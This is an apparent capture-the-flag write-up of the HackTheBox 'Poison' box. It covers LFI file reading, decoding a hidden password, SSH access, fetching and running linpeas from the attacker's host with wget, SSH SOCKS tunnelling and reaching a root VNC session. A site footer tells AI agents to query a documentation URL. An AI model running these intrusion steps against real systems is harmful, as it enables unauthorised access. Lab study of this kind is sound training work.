# Poison

The initial access was incredibly easy, but the privilege escalation required some tools and concepts that I was not well versed in, which made it difficult for me to spot.

## Initial Enumeration

`sudo nmap -sV -sC <IP>`

```
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
```

Theres a webpage at <http://10.10.10.84/>

<figure><img src="/files/mAMiOwHOJD3lYs1iG7gb" alt=""><figcaption></figcaption></figure>

## LFI Exploit

The scriptname field allow to read local files, which raises LFI suspicions :)

And indeed:<br>

<figure><img src="/files/JaFsgH3PniOgwZkw2jQg" alt=""><figcaption></figcaption></figure>

We got the user charix and its FreeBSD.

## Password Extraction

If you open the php files shown in the info text one by one, the listfiles.php stands out:<br>

<figure><img src="/files/FktbSgbVAgC9z85sRZyV" alt=""><figcaption></figcaption></figure>

Opening the pwdbackup.txt shows something interesting:<br>

<figure><img src="/files/gMVOKH715qEP5Jav9q8L" alt=""><figcaption></figcaption></figure>

```
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=
```

base64-decoding the string 13 times using cyberchef results in this:

```
Charix!2#4%6&8(0
```

<figure><img src="/files/0rCzo9pjY5wM3FbbsEYd" alt=""><figcaption></figcaption></figure>

ssh-ing to the box with `charix:Charix!2#4%6&8(0` worked.

## Internal Enumeration

<figure><img src="/files/Poath4Auc1YhvBcyayWP" alt=""><figcaption></figcaption></figure>

I should exfiltrate the zip file.

Typing ‘python’ and pressing tab I found out that python2 was installed on the host, so I used a Python webserver to exfiltrate the file via wget:

`python -m SimpleHTTPServer 8000`

It is password protected:<br>

<figure><img src="/files/QSkydTajoq79j6Du26Kl" alt=""><figcaption></figcaption></figure>

Using zip2john I could extract the password:

```
[nix@local] $ zip2john /HTBfolder/Boxes/HTB-Poison/secret.zip
ver 2.0 secret.zip/secret PKZIP Encr: cmplen=20, decmplen=8, crc=77537827
secret.zip/secret:$pkzip2$1*1*2*0*14*8*77537827*0*24*0*14*7753*9827*8061b9caf8436874ad47a9481863b54443379d4c*$/pkzip2$:secret:secret.zip::/HTBfolder/Boxes/HTB-Poison/secret.zip
```

Putting the hash in a file and attempting to crack it with john did not work

`john --wordlist=/usr/share/seclists/Passwords/rockyou.txt hash.tmp`

Wow Okay, the password `Charix!2#4%6&8(0` worked to open the zip.

The content of the secret file is odd:

`[|Ֆz!`

## Internal Enumeration 2

I established a dynamic reverse proxy connection to the host with ssh:

`ssh -D 9050 charix@10.10.10.84`

This does not seem to work.

<figure><img src="/files/25tDLjN42n8KKG4FfzP1" alt=""><figcaption></figcaption></figure>

`charix@Poison:~ % cat /etc/ssh/sshd_config | grep TcpForwarding`

```
#AllowTcpForwarding yes
# AllowTcpForwarding no
```

TcpForwarding is not explicitly prohibited, but it might be a firewall issue

This does only show 22 and 9050, which is odd:

`proxychains ss -tulpn`

`uname -a` reveals this: FreeBSD Poison 11.1-RELEASE

With a first internet search it does not seem like there is a big vulnerability for that os version.

`ps -aux | grep root` shows this, which could be interesting:

```
root 529 0.0 0.7 23620 7468 v0- I 17:37 0:00.04 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/
root 540 0.0 0.5 67220 4676 v0- I 17:37 0:00.02 xterm -geometry 80x24+10+10 -ls -title X Desktop
root 703 0.0 0.2 10484 1608 v7 Is+ 17:39 0:00.00 /usr/libexec/getty Pc ttyv7
root 564 0.0 0.3 19660 2868 0 Is+ 17:37 0:00.01 -csh (csh)
```

I hosted linpeas on my machine and fetched and used it like this:

```
charix@Poison:~ % wget 
http://10.10.16.6:8000/linpeas.sh

charix@Poison:~ % chmod +x linpeas.sh
./linpeas.sh
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
sed: first RE may not be empty
/tmp/.X11-unix/X1
└─(Read Write)
/var/run/devd.pipe
└─(Read Write)
/var/run/devd.seqpacket.pipe
└─(Read Write)
/var/run/log
└─(Read Write)
-r-sr-xr-x 1 root wheel 2.1M Jan 2 2018 /usr/local/bin/Xorg (Unknown SUID binary!)
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/lesspipe.sh
/usr/local/bin/gettext.sh
<SNIP>
```

I also ran LinEnum. But I did not see more than with linpeas.

**Webserver deeper enum:**

Since I could not find anything interesting locally, I went back to the webserver and checked the php info file. Maybe it runs as root or something along those lines.

<http://10.10.10.84/browse.php?file=phpinfo.php>

```
webroot: /usr/local/www/apache24/data
charix@Poison:/usr/local/www/apache24/data % ls
browse.php index.php info.php ini.php listfiles.php phpinfo.php pwdbackup.txt
```

I could not identify any obvious vulnerability in the php configuration.

One instance of httpd seems to run as root (`ps -aux`)

```
root 632 0.0 1.1 99172 11516 - Ss 17:50 0:00.06 /usr/local/sbin/httpd -DNOHTTPACCEPT
```

I read that the initial access should have usually been a log poisoning. You should have gotten the www-data user with poisoning the apache log with a php executable user agent and then calling the log. From what I saw, this was not necessary. Since I made no progress here, I peaked in a walkthrough to get a hint. It was that the VNC session that I saw earlier could be connected to with a VNC viewer. So I was on the right track with the X Session I found and also the port forwarding I did was a good idea. I just have to connect to the session somehow.

Starting RealVNC Viewer with proxychains and calling 127.0.0.1 did not work.

I googled how to find listening ports on BSD:

<https://www.cyberciti.biz/faq/freebsd-unix-find-the-process-pid-listening-on-a-certain-port-commands/>

`sockstat -l`

```
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
www httpd 1144 3 tcp6 *:80 *:*
www httpd 1144 4 tcp4 *:80 *:*
root sendmail 650 3 tcp4 127.0.0.1:25 *:*
www httpd 648 3 tcp6 *:80 *:*
www httpd 648 4 tcp4 *:80 *:*
www httpd 647 3 tcp6 *:80 *:*
www httpd 647 4 tcp4 *:80 *:*
www httpd 646 3 tcp6 *:80 *:*
www httpd 646 4 tcp4 *:80 *:*
www httpd 645 3 tcp6 *:80 *:*
www httpd 645 4 tcp4 *:80 *:*
www httpd 644 3 tcp6 *:80 *:*
www httpd 644 4 tcp4 *:80 *:*
root httpd 632 3 tcp6 *:80 *:*
root httpd 632 4 tcp4 *:80 *:*
root sshd 620 3 tcp6 *:22 *:*
root sshd 620 4 tcp4 *:22 *:*
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
root syslogd 390 4 dgram /var/run/log
root syslogd 390 5 dgram /var/run/logpriv
root syslogd 390 6 udp6 *:514 *:*
root syslogd 390 7 udp4 *:514 *:*
root devd 319 4 stream /var/run/devd.pipe
root devd 319 5 seqpac /var/run/devd.seqpacket.pipe
```

Okay, I will try connecting again, using the ports 5901 and 5801.

It works, but it asks for a password. The strings I collected so far did not work.

<figure><img src="/files/cEQ80Ng1mmm0mP7e4mh9" alt=""><figcaption></figcaption></figure>

The string from the file looks very weird and didnt work. I downloaded tigervnc, which is a CLI vnc viewer. It can use a file as password input:

`proxychains vncviewer passwd=/HTBfolder/Boxes/HTB-Poison/secret 127.0.0.1:5901`

This worked to connect to the VNC session!

<figure><img src="/files/Bc5i1CWlhMRs6eQ3mmFQ" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://shibudocs.gitbook.io/htb-writeups/boxes-medium/temp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.